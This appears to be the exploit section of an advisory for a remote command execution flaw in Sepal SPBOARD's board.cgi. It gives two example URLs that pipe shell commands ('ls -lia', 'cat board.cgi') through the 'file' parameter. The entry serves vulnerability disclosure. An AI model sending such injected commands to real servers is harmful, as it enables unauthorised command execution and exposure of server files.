• info
• discussion
• exploit
• solution
• references

Sepal SPBOARD 'board.cgi' Remote Command Execution Vulnerability

Attackers can exploit the issue via a browser.

The following example URIs are available:

http://www.example.com/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|ls -lia|&action=down
http://www.example.com/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|cat board.cgi|&action=down_file